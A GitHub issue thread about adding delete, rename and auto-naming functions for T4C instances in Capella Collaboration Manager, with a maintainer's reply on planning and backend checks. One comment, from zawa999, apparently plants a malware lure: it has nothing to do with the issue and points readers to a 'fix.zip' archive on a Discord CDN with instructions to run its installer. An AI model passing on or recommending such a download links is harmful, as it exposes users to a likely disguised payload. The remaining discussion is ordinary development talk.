### ISSUE TITLE
Bug: Capella T4C instances cannot be removed or renamed

### ISSUE THREAD

**Issue by ChristopherFoerster** [DSD-DBS/capella-collab-manager#1739]
A typical scenario of maintaining T4C is management of versions and instances. In Capella Collaboration Manager some limitations exist that blocks this management and makes it hard to use for end-users as well.

Please introduce the following changes
1. In UI /settings/modelsources/t4c and API please allow to delete T4C instances
2. In UI /settings/modelsources/t4c and API please allow to rename T4C instances
3. In UI /project/ilbs-test/model/ilbs-test/t4c-model/create-existing please auto-generate "Instance" using the version and tool as it will show the name currently (and default is not helpful for end-users). In API that is fine as we can get instance ID by filtering on version and map it as needed. 

![image](https://github.com/user-attachments/assets/e04f984f-0761-4d14-81e3-9188736003ed)

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by MoritzWeber0** [comment]
1. Tracked in https://github.com/DSD-DBS/capella-collab-manager/issues/971, already planned for one of the next releases.
2. Not tracked yet, but LGTM.
3. I would even be a bit stricter here. The backend should refuse to link T4C instances with the wrong version. In the frontend, we should suggest only displaying suitable instances. If only one instance is possible, it should be selected automatically.
